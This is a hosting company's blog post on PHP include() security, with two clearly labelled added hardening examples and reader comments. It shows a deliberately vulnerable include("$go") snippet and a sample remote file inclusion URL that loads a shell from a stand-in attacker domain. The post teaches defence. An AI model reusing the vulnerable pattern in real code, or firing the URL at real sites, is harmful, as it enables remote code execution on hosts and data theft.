PHP Security and YOU – Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice, and most usage comes in two forms: including internal files from your own domain, and including files from remote (external) sources. This looks something like:

Internal:

<?php
   include("http://www.myowndomain.com/something.txt");
?>

External:

<?php
   include("http://www.externaldomain.com/something.txt");
?>

Both are valid syntax in the PHP world, but there are two main problems we see on the servers. Sometimes when you include a file using the URL of your local domain you can cause a PHP loop: the script makes an HTTP request to itself, which makes another request, and so on, until the endless requests cause server load issues or even crash the server. If you want to include files from your local domain, use the server path instead:

<?php
   include('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

<?php
   include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that it runs everything through the PHP parser and evaluates whatever code it finds. The real danger comes from passing a variable to include(), which can be easily exploited. Here is an example of code in an index.php:

<?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");   // $go comes straight from the request with no checks
    echo "  </body>\n";
    echo "</html>\n";
?>

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your account: installing phishing sites, sending spam and stealing data.
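Here is one way to rewrite that index.php so the page name from the URL is only ever used to pick from a fixed list of local files. This is an added example, not code from the original post or from HostNexus; the pages/ directory, the page names, and the check on allow_url_include are assumptions for illustration.

```php
<?php
// Added example: a hardened replacement for include("$go").
// Assumed layout (constructed for this example): the includable pages live in
// a pages/ directory next to index.php, e.g.
// /home/httpd/vhosts/myowndomain.com/httpdocs/pages/home.php

// Allowlist: the only values of ?go= that map to a file on disk.
// The request value is used as a KEY, never as a path or URL.
$pages = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Default to the home page when nothing was asked for.
$go = isset($_GET['go']) ? (string) $_GET['go'] : 'home';

// Anything not in the allowlist (including http://..., ../ or null bytes)
// is rejected outright. strict in_array is not needed because we only
// ever look the value up as an array key.
if (!array_key_exists($go, $pages)) {
    http_response_code(404);
    echo "Page not found\n";
    exit;
}

// Defence in depth: even if a future bug lets a URL reach include(),
// PHP will refuse to fetch it when allow_url_include is off (php.ini).
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('Warning: allow_url_include is enabled; set it to Off in php.ini');
}

// Build the path from the script's own directory, not from the request.
$file = __DIR__ . '/pages/' . $pages[$go];

echo "<html>\n";
echo "  <body>\n";
include $file;
echo "  </body>\n";
echo "</html>\n";
```

The key change is that the request never supplies a filename or URL, only a lookup key; if the key is unknown the script stops before include() is reached. Turning allow_url_include off in php.ini gives a second layer that blocks remote includes server-wide regardless of what application code does.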

If you want to include files from remote domains use PHP’s readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure, it still provides more protection, as readfile() simply outputs the data to the browser rather than parsing it as PHP. Bear in mind that the remote content is sent to the visitor unchanged, so it should still be treated as untrusted data rather than something you would display verbatim.
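The following added example (not the post's own code) shows the readfile() approach the post recommends beside a slightly more careful variant: the remote file is read into a string and HTML-escaped before being printed, so a remote text file containing script tags is shown as text rather than run in the visitor's browser. The URL is the post's own placeholder; the five-second timeout is an assumption.

```php
<?php
// Added example: fetching a remote file as DATA, never as code.
// Both readfile() and file_get_contents() need allow_url_fopen=On to open
// http:// URLs; neither one evaluates the content as PHP.
$url = 'http://www.externaldomain.com/something.txt';

// Variant 1 (what the post suggests): stream the raw bytes straight to the
// browser. Nothing is parsed by PHP, but the bytes arrive unescaped.
function showRemoteRaw($url)
{
    return readfile($url);   // returns bytes written, or false on failure
}

// Variant 2: read the file into a string, then escape it before output so
// any HTML or <script> in the remote file is displayed, not executed.
function showRemoteEscaped($url)
{
    // Assumed timeout so a slow or dead remote host cannot hang the page.
    $ctx  = stream_context_create(['http' => ['timeout' => 5]]);
    $data = @file_get_contents($url, false, $ctx);

    if ($data === false) {
        return "<p>Remote file unavailable.</p>\n";
    }

    return '<pre>' . htmlspecialchars($data, ENT_QUOTES, 'UTF-8') . "</pre>\n";
}

echo showRemoteEscaped($url);
```

Whichever variant you use, the remote host is still in control of what gets displayed; if the content drives any logic in your application, parse it explicitly and validate the pieces you need rather than trusting the whole file.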

We’d love to enforce the two practices above, but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these functions, then please do revisit your code and help yourself to secure your data and server.

Laurence

About the author

Laurence

Hi, my name is Laurence and I’m a web hosting aficionado. When I'm not cracking the whip at HN I can be found at the gym where I'm chasing that 500lb deadlift and kickboxing with guys half my age and still giving as good as I get. Yep, a rare breed of tech nerd mixed in with meathead.

    2 comments

    1. Alex

      The best solution is not to include remote files. I mean why would someone do that?

      If you really need to include a file from a remote host, like you said, you can read the file then parse the need coded yourself instead of blindly executing it.

    2. Robert Spriggs

      I’m with Alex as to why should you ever “include” a remote file. I don’t think I’ve ever done it – or if I did, it was when I was more naiave (however you spell it ).

      A simple rule is if you get something from a remote server use CURL. Always. Then parse and understand the contents before doing what you need.

      A small side-note. It’s amazing how few developers actually know what readfile() does. It’s one of my interview questions for senior PHP developers – can you explain the difference between readfile(), include(), include_once(), require() and require_once()? It has only once (in a lot of interviews) been answered correctly. Only once. Most people get it confused with get_file_contents().

      Also never eval() remote or uncensored code. That’s inviting danger even more than including remote files.

      Look after the shared servers 😉
